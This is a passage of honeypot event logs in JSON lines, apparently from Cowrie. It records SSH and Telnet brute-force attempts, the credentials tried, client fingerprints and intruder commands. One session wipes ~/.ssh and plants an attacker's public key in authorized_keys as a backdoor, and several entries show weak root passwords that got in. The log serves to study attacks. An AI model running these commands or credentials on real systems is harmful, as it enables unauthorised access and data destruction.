istp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:18:16.100874Z","src_ip":"103.12.154.87","session":"b574eb345e90"}
{"eventid":"cowrie.login.failed","username":"sysadm","password":"123","message":"login attempt [sysadm/123] failed","sensor":"my-vps","timestamp":"2025-08-26T07:18:17.017337Z","src_ip":"103.12.154.87","session":"b574eb345e90"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:18:18.247259Z","src_ip":"103.12.154.87","session":"b574eb345e90"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":58680,"dst_ip":"1.2.3.4","dst_port":22,"session":"44bf6f2f34f1","protocol":"ssh","message":"New connection: 103.12.154.87:58680 (1.2.3.4:22) [session: 44bf6f2f34f1]","sensor":"my-vps","timestamp":"2025-08-26T07:19:34.971869Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:19:34.972941Z","src_ip":"103.12.154.87","session":"44bf6f2f34f1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:19:35.185718Z","src_ip":"103.12.154.87","session":"44bf6f2f34f1"}
{"eventid":"cowrie.login.success","username":"root","password":"mM123456!","message":"login attempt [root/mM123456!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:19:36.073916Z","src_ip":"103.12.154.87","session":"44bf6f2f34f1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:19:36.562340Z","src_ip":"103.12.154.87","session":"44bf6f2f34f1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:19:36.563333Z","src_ip":"103.12.154.87","session":"44bf6f2f34f1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:19:36.565155Z","src_ip":"103.12.154.87","session":"44bf6f2f34f1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:19:36.779150Z","src_ip":"103.12.154.87","session":"44bf6f2f34f1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:19:37.732851Z","src_ip":"103.12.154.87","session":"44bf6f2f34f1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T07:19:37.733497Z","src_ip":"103.12.154.87","session":"44bf6f2f34f1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T07:19:37.947238Z","src_ip":"103.12.154.87","session":"44bf6f2f34f1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:19:37.948167Z","src_ip":"103.12.154.87","session":"44bf6f2f34f1"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":59800,"dst_ip":"1.2.3.4","dst_port":22,"session":"d94f6fec8936","protocol":"ssh","message":"New connection: 103.12.154.87:59800 (1.2.3.4:22) [session: d94f6fec8936]","sensor":"my-vps","timestamp":"2025-08-26T07:19:38.156651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:19:38.157583Z","src_ip":"103.12.154.87","session":"d94f6fec8936"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:19:38.367317Z","src_ip":"103.12.154.87","session":"d94f6fec8936"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T07:19:39.252287Z","src_ip":"103.12.154.87","session":"d94f6fec8936"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:19:40.465989Z","src_ip":"103.12.154.87","session":"d94f6fec8936"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":60602,"dst_ip":"1.2.3.4","dst_port":22,"session":"95951ebcb8c1","protocol":"ssh","message":"New connection: 103.12.154.87:60602 (1.2.3.4:22) [session: 95951ebcb8c1]","sensor":"my-vps","timestamp":"2025-08-26T07:19:40.668267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:19:40.669049Z","src_ip":"103.12.154.87","session":"95951ebcb8c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:19:41.570288Z","src_ip":"103.12.154.87","session":"95951ebcb8c1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50280,"dst_ip":"1.2.3.4","dst_port":22,"session":"179a8c12b795","protocol":"ssh","message":"New connection: 217.72.205.35:50280 (1.2.3.4:22) [session: 179a8c12b795]","sensor":"my-vps","timestamp":"2025-08-26T07:19:41.815235Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:19:41.816813Z","src_ip":"217.72.205.35","session":"179a8c12b795"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:19:42.427886Z","src_ip":"103.12.154.87","session":"95951ebcb8c1"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:19:42.638025Z","src_ip":"103.12.154.87","session":"95951ebcb8c1"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:19:42.639008Z","src_ip":"103.12.154.87","session":"44bf6f2f34f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35686,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7e7e9f51c82","protocol":"ssh","message":"New connection: 212.227.235.229:35686 (1.2.3.4:22) [session: a7e7e9f51c82]","sensor":"my-vps","timestamp":"2025-08-26T07:20:47.874561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:20:48.449667Z","src_ip":"212.227.235.229","session":"a7e7e9f51c82"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T07:20:48.450349Z","src_ip":"212.227.235.229","session":"a7e7e9f51c82"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":56744,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a0e786e6ccc","protocol":"ssh","message":"New connection: 103.12.154.87:56744 (1.2.3.4:22) [session: 7a0e786e6ccc]","sensor":"my-vps","timestamp":"2025-08-26T07:20:49.780609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:20:49.781306Z","src_ip":"103.12.154.87","session":"7a0e786e6ccc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:20:50.016625Z","src_ip":"103.12.154.87","session":"7a0e786e6ccc"}
{"eventid":"cowrie.login.failed","username":"vm","password":"123456","message":"login attempt [vm/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T07:20:51.005291Z","src_ip":"103.12.154.87","session":"7a0e786e6ccc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:20:52.245358Z","src_ip":"103.12.154.87","session":"7a0e786e6ccc"}
{"eventid":"cowrie.login.success","username":"root","password":"Pakistan1","message":"login attempt [root/Pakistan1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:20:52.860510Z","src_ip":"212.227.235.229","session":"a7e7e9f51c82"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:20:53.824260Z","src_ip":"212.227.235.229","session":"a7e7e9f51c82"}
{"eventid":"cowrie.session.connect","src_ip":"125.82.243.25","src_port":15313,"dst_ip":"1.2.3.4","dst_port":22,"session":"31e056bddf3a","protocol":"ssh","message":"New connection: 125.82.243.25:15313 (1.2.3.4:22) [session: 31e056bddf3a]","sensor":"my-vps","timestamp":"2025-08-26T07:21:22.024277Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000\\xee\u0001\u0000\u0000\\xea\u0003\u0003","message":"Remote SSH version: \u0016\u0003\u0001\u0000\\xee\u0001\u0000\u0000\\xea\u0003\u0003","sensor":"my-vps","timestamp":"2025-08-26T07:21:22.025740Z","src_ip":"125.82.243.25","session":"31e056bddf3a"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:21:22.026890Z","src_ip":"125.82.243.25","session":"31e056bddf3a"}
{"eventid":"cowrie.session.connect","src_ip":"36.106.166.232","src_port":41523,"dst_ip":"1.2.3.4","dst_port":22,"session":"98be4895050d","protocol":"ssh","message":"New connection: 36.106.166.232:41523 (1.2.3.4:22) [session: 98be4895050d]","sensor":"my-vps","timestamp":"2025-08-26T07:21:23.547125Z"}
{"eventid":"cowrie.session.connect","src_ip":"117.15.90.171","src_port":11045,"dst_ip":"1.2.3.4","dst_port":22,"session":"893f99503e2d","protocol":"ssh","message":"New connection: 117.15.90.171:11045 (1.2.3.4:22) [session: 893f99503e2d]","sensor":"my-vps","timestamp":"2025-08-26T07:21:23.997826Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T07:21:23.998769Z","src_ip":"117.15.90.171","session":"893f99503e2d"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:21:24.000490Z","src_ip":"117.15.90.171","session":"893f99503e2d"}
{"eventid":"cowrie.session.connect","src_ip":"221.207.34.187","src_port":33165,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1cf4d7bd968","protocol":"ssh","message":"New connection: 221.207.34.187:33165 (1.2.3.4:22) [session: b1cf4d7bd968]","sensor":"my-vps","timestamp":"2025-08-26T07:21:24.416013Z"}
{"eventid":"cowrie.client.version","version":"USER anonymous","message":"Remote SSH version: USER anonymous","sensor":"my-vps","timestamp":"2025-08-26T07:21:24.416978Z","src_ip":"221.207.34.187","session":"b1cf4d7bd968"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:21:24.417745Z","src_ip":"221.207.34.187","session":"b1cf4d7bd968"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000\\xee\u0001\u0000\u0000\\xea\u0003\u0003\\xc3\\xe2\\x832\u000f4\\xa7g\\xaaY\\xb9\u001c\\xef\\xfc\\xae\u001ar\u0016\\xab\u00058\\xe2\u0006\\xec\u0019\\x8ft\\xc9)\u000f\\x94\u0017 \\xa6^\\x9b\\xa3W\\xe8\\x8a}\\xb9\\x98\\xcd\\xef\\xf8\\xcb\u07cd!\u000e'B_:\\xa7\u001a\\x95\u001b\u0005\u0018j\\xc3\\xe8\\xbb\u0000&\\xc0+\\xc0/\\xc0,\\xc00\u0329\u0328\\xc0\t\\xc0\u0013\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000\\xee\u0001\u0000\u0000\\xea\u0003\u0003\\xc3\\xe2\\x832\u000f4\\xa7g\\xaaY\\xb9\u001c\\xef\\xfc\\xae\u001ar\u0016\\xab\u00058\\xe2\u0006\\xec\u0019\\x8ft\\xc9)\u000f\\x94\u0017 \\xa6^\\x9b\\xa3W\\xe8\\x8a}\\xb9\\x98\\xcd\\xef\\xf8\\xcb\u07cd!\u000e'B_:\\xa7\u001a\\x95\u001b\u0005\u0018j\\xc3\\xe8\\xbb\u0000&\\xc0+\\xc0/\\xc0,\\xc00\u0329\u0328\\xc0\t\\xc0\u0013\\xc0","sensor":"my-vps","timestamp":"2025-08-26T07:21:24.616986Z","src_ip":"36.106.166.232","session":"98be4895050d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:21:24.617995Z","src_ip":"36.106.166.232","session":"98be4895050d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58976,"dst_ip":"1.2.3.4","dst_port":23,"session":"4c26fa5b900a","protocol":"telnet","message":"New connection: 212.227.125.160:58976 (1.2.3.4:23) [session: 4c26fa5b900a]","sensor":"my-vps","timestamp":"2025-08-26T07:22:14.038343Z"}
{"eventid":"cowrie.session.closed","duration":9.889400482177734,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:22:23.927673Z","src_ip":"212.227.125.160","session":"4c26fa5b900a"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":50204,"dst_ip":"1.2.3.4","dst_port":22,"session":"5593b9ef9ed0","protocol":"ssh","message":"New connection: 45.88.8.215:50204 (1.2.3.4:22) [session: 5593b9ef9ed0]","sensor":"my-vps","timestamp":"2025-08-26T07:23:56.023996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:23:56.522111Z","src_ip":"45.88.8.215","session":"5593b9ef9ed0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T07:23:56.522954Z","src_ip":"45.88.8.215","session":"5593b9ef9ed0"}
{"eventid":"cowrie.login.success","username":"root","password":"Lankesh@123","message":"login attempt [root/Lankesh@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:23:58.245093Z","src_ip":"45.88.8.215","session":"5593b9ef9ed0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:23:58.499438Z","src_ip":"45.88.8.215","session":"5593b9ef9ed0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":21424,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7df4b2d9859","protocol":"ssh","message":"New connection: 212.227.235.229:21424 (1.2.3.4:22) [session: e7df4b2d9859]","sensor":"my-vps","timestamp":"2025-08-26T07:25:17.829858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T07:25:17.833244Z","src_ip":"212.227.235.229","session":"e7df4b2d9859"}
